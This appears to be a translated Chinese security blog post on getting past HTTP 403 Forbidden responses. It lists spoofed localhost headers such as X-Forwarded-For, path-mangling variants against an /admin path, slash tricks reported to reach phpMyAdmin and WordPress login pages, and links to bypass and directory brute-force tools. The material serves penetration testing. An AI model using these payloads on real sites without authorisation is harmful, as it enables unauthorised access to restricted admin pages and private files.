译-绕过 403
发表于
|
403-forbidden 一般是服务器配置不允许访问该目录或文件
HTTP 标头模糊测试
在某些情况下,可以通过更改请求的 Header 并包含内部地址来访问页面和私有文件,以下是一些示例;
1
2
3
4
5
6
7
8
| X-ProxyUser-Ip: 127.0.0.1
Client-IP: 127.0.0.1
Host: localhost
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Real-IP: 127.0.0.1
|
路径模糊测试
尝试对 url 进行一些更改,使用特殊字符或包括 HTML 编码,例如:
1
2
3
4
5
6
7
8
9
10
11
| test.com/admin/*
test.com/*admin/
test.com/%2fadmin/
test.com%2fadmin%2f
test.com/./admin/
test.com//admin/./
test.com///admin///
test.com//admin//
test.com/ADMIN/
test.com/;/admin/
test.com//;//admin/
|
下面是phpmyadmin 的绕过,限制了特定ip对/phpmyadmin/ 的访问,下面都不行
1
2
3
4
| /phpmyadmin/*
/./phpmyadmin/
//phpmyadmin//
/*/phpmyadmin/
|
下面3个斜杠就行
这是使用 2 个斜杠访问wordpress的登录后台
有人已经开发了攻击,帮助识别并绕过403
https://github.com/iamj0ker/bypass-403
Burpsuite Professional的插件
https://portswigger.net/bappstore/444407b96d9c4de0adb7aed89e826122
查找具有 403 权限的可能目录,我们可以使用 Dirsearch 对目录和文件执行暴力破解。
https://github.com/maurosoria/dirsearch
https://github.com/LucasPDiniz/403-Bypass
假如你看不到评论,可能是你访问Disqus被墙了,请使用代理访问
文章来源: https://www.giantbranch.cn/2023/11/16/%E8%AF%91-%E7%BB%95%E8%BF%87%20403/
如有侵权请联系:admin#unsafe.sh
